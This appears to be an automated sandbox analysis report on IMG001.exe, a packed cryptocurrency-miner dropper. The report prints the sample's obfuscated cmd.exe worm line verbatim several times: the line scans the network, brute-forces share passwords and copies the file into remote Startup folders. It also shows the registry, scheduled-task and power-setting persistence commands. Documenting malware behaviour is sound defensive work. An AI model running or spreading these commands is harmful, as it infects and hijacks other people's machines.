Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /v:on /c @(for /f 'usebackq tokens=1' %i in (`@net view^\|find /i '\\' ^\|^\| @arp -a^\|find /i ' 1'`) do @set str_!random!=%i)& @for /f 'usebackq tokens=1* delims==' %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:- =!& set f=IMG001.exe& set n=1704& @if not '!s!'=='%COMPUTERNAME%' @echo connect to \\!s! & (for /f 'usebackq tokens=1' %j in (`net view \\!s!^\|find /i ' '`) do @echo f\|xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' '\\!s!\%j\!f!' 1>nul && @echo copy to '\\!s!\%j\!f!') & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin ) do @for %p in (0 1 123 %u !n! '') do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not '%p%u'=='01' net use %c '%p' /user:'%u') && @((echo [Section1] & echo p=%p %u)>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & @(for %d in ('%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\ \ \ \!f!' '%c\Documents and Settings\All Users\ \ \ \!f!' '%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!' '%c\Windows\All Users\Start menu\Programs\Startup\!f!' '%c\%u\!f!' ) do @echo f\|@xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' %d 1>nul && @echo copy to %d) & @echo nul>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im tftp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v '' /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' /t REG_SZ	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 'UAC' /SC ONLOGON /F /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 'UAC' /RU 'SYSTEM' /SC ONLOGON /F /V1 /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /CHANGE -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /CHANGE -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c taskkill /f /im tftp.exe & tskill tftp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c @net view\|find /i '\\' \|\| @arp -a\|find /i ' 1'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im tftp.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net view
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /i '\\'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ARP.EXE arp -a
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /i ' 1'

Source: C:\Users\user\Desktop\IMG001.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: IMG001.exe

Static file information: File size 3551765 > 1048576

Source:	Binary string: E:\CryptoNight\bitmonero-master\src\miner\Release\Crypto.pdb source: NsCpuCNMiner32.exe.6.dr
Source:	Binary string: E:\CryptoNight\bitmonero-master\src\miner\x64\CPU-Release\Crypto.pdb source: NsCpuCNMiner64.exe.6.dr

Data Obfuscation:

Obfuscated command line found

Show sources

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /v:on /c @(for /f 'usebackq tokens=1' %i in (`@net view^\|find /i '\\' ^\|^\| @arp -a^\|find /i ' 1'`) do @set str_!random!=%i)& @for /f 'usebackq tokens=1* delims==' %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:- =!& set f=IMG001.exe& set n=1704& @if not '!s!'=='%COMPUTERNAME%' @echo connect to \\!s! & (for /f 'usebackq tokens=1' %j in (`net view \\!s!^\|find /i ' '`) do @echo f\|xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' '\\!s!\%j\!f!' 1>nul && @echo copy to '\\!s!\%j\!f!') & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin ) do @for %p in (0 1 123 %u !n! '') do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not '%p%u'=='01' net use %c '%p' /user:'%u') && @((echo [Section1] & echo p=%p %u)>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & @(for %d in ('%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\ \ \ \!f!' '%c\Documents and Settings\All Users\ \ \ \!f!' '%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!' '%c\Windows\All Users\Start menu\Programs\Startup\!f!' '%c\%u\!f!' ) do @echo f\|@xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' %d 1>nul && @echo copy to %d) & @echo nul>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /v:on /c @(for /f 'usebackq tokens=1' %i in (`@net view^\|find /i '\\' ^\|^\| @arp -a^\|find /i ' 1'`) do @set str_!random!=%i)& @for /f 'usebackq tokens=1* delims==' %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:- =!& set f=IMG001.exe& set n=1704& @if not '!s!'=='%COMPUTERNAME%' @echo connect to \\!s! & (for /f 'usebackq tokens=1' %j in (`net view \\!s!^\|find /i ' '`) do @echo f\|xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' '\\!s!\%j\!f!' 1>nul && @echo copy to '\\!s!\%j\!f!') & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin ) do @for %p in (0 1 123 %u !n! '') do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not '%p%u'=='01' net use %c '%p' /user:'%u') && @((echo [Section1] & echo p=%p %u)>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & @(for %d in ('%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\ \ \ \!f!' '%c\Documents and Settings\All Users\ \ \ \!f!' '%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!' '%c\Windows\All Users\Start menu\Programs\Startup\!f!' '%c\%u\!f!' ) do @echo f\|@xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' %d 1>nul && @echo copy to %d) & @echo nul>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))			Jump to behavior

Sample is protected by VMProtect

Show sources

Source: NsCpuCNMiner32.exe.6.dr	Static PE information: Section: .vmp1 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: NsCpuCNMiner64.exe.6.dr	Static PE information: Section: .vmp1 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\IMG001.exe

Code function: 0_2_00405D12 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405D12

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp1

Source: tftp.exe.0.dr	Static PE information: section name: .eh_fram
Source: tftp.exe.6.dr	Static PE information: section name: .eh_fram
Source: NsCpuCNMiner32.exe.6.dr	Static PE information: section name: .vmp0
Source: NsCpuCNMiner32.exe.6.dr	Static PE information: section name: .vmp1
Source: NsCpuCNMiner64.exe.6.dr	Static PE information: section name: .vmp0
Source: NsCpuCNMiner64.exe.6.dr	Static PE information: section name: .vmp1
Source: tftp.exe.26.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Code function: 5_2_0040F4E4 push eax; mov dword ptr [esp], edi	5_2_0040F58C
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Code function: 5_2_0040F4E4 push ecx; mov dword ptr [esp], edi	5_2_0040F6C0
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Code function: 5_2_0040FA18 push eax; mov dword ptr [esp], esi	5_2_0040FBD1
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Code function: 5_2_0040FA18 push eax; mov dword ptr [esp], 00000000h	5_2_0040FBDA
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Code function: 5_2_004126B0 push eax; mov dword ptr [esp], ebx	5_2_004127E9
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Code function: 5_2_0040F344 push eax; mov dword ptr [esp], esi	5_2_0040F3C3

Source: initial sample	Static PE information: section name: .vmp1 entropy: 7.93189489054
Source: initial sample	Static PE information: section name: .vmp1 entropy: 7.9316879495

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File created: C:\IMG001.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File created: C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\IMG001.exe	File created: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File created: C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File created: C:\Users\user\AppData\Local\Temp\tftp.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File created: C:\Users\user\AppData\Local\Temp\nsxD347.tmp\inetc.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File created: C:\Windows\Temp\tftp.exe	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File created: C:\Windows\Temp\tftp.exe			Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 'UAC' /SC ONLOGON /F /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe

File created: C:\Windows\Tasks\UAC.job

Jump to behavior

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk

Jump to behavior

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL			Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Show sources

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: icon (3107).png

Creates files in alternative data streams (ADS)

Show sources

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

File created: C:\IMG001.exe\:P:$DATA

Jump to behavior

Source: C:\Users\user\Desktop\IMG001.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found stalling execution ending in API Sleep call

Show sources

Source: C:\Users\user\AppData\Local\Temp\tftp.exe

Stalling execution: Execution stalls by calling Sleep

graph_5-9085

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Dropped PE file which has not been started: C:\IMG001.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner32.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\tftp.exe

API coverage: 8.9 %

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe TID: 5584	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tftp.exe TID: 4912	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tftp.exe TID: 1724	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tftp.exe TID: 5384	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tftp.exe TID: 6044	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tftp.exe TID: 3260	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tftp.exe TID: 3708	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tftp.exe TID: 6200	Thread sleep count: 75 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\tftp.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\IMG001.exe	Code function: 0_2_00405CEB FindFirstFileA,FindClose,	0_2_00405CEB
Source: C:\Users\user\Desktop\IMG001.exe	Code function: 0_2_00405315 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405315
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Code function: 6_2_00405CEB FindFirstFileA,FindClose,	6_2_00405CEB
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Code function: 6_2_00405315 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	6_2_00405315
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Code function: 26_2_00405CEB FindFirstFileA,FindClose,	26_2_00405CEB
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Code function: 26_2_00405315 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	26_2_00405315

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Thread delayed: delay time: 60000

Jump to behavior

